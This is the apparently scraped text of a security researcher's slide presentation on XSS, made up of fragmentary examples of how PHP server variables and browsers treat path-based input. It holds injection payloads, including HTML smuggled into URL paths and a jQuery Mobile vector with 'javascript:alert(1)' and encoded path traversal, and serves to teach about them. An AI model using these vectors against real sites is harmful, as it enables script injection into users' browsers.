English version of my presentation in Shibuya.XSS techtalk #7. Japanese version is here: https://speakerdeck.com/masatokinugawa/shibuya-dot-xss-techtalk-number-7
FIRST HALF
https://host/tags/aaa/......
...content="https://host/path/index">...
https://host/path/index?p=1

...content="https://host/path/index;aaa">...
https://host/path/index;aaa?p=1

http://php.net/index.php
http://php.net/index.php/xxx/yyy/zzz

http://shibuyaxss.connpass.com/event/28232/
http://shibuyaxss.connpass.com/event/28232/;abc

SCRIPT_URL /test.php/PATH
SCRIPT_URI http://localhost/test.php/PATH
PATH_INFO /PATH
PATH_TRANSLATED \PATH<\b>
PHP_SELF /test.php/PATH

GET /path?query HTTP/1.1
The URI which was given in order to access this page; for instance, '/index.html'.
http://php.net/manual/ja/reserved.variables.server.php

/test.php/PATH?QUERY
GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY%3C/b%3E HTTP/1.1
QUERY_STRING %3Cb%3EQUERY%3C/b%3E
REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY%3C/b%3E

/test.php/%3Cb%3EPATH%3C/b%3E?QUERY
GET /test.php/%3Cb%3EPATH%3C/b%3E?QUERY HTTP/1.1
QUERY_STRING QUERY
REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?QUERY

http://localhost/test.php/PATH
GET /test.php/PATH HTTP/1.1

/test.php/%3Cb%3EPATH%3C/b%3E
GET /test.php/PATH HTTP/1.1
REQUEST_URI /test.php/PATH
location.pathname /test.php/%3Cb%3EPATH%3C/b%3E
LATER HALF
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
X-UA-Compatible: IE=9

ifr=document.createElement('');
document.body.appendChild(ifr);
InvalidCharacterError

console.log(document.documentMode) /* 9 */

src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/%2F..%2F..%2Fjizen2#hash">
src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js">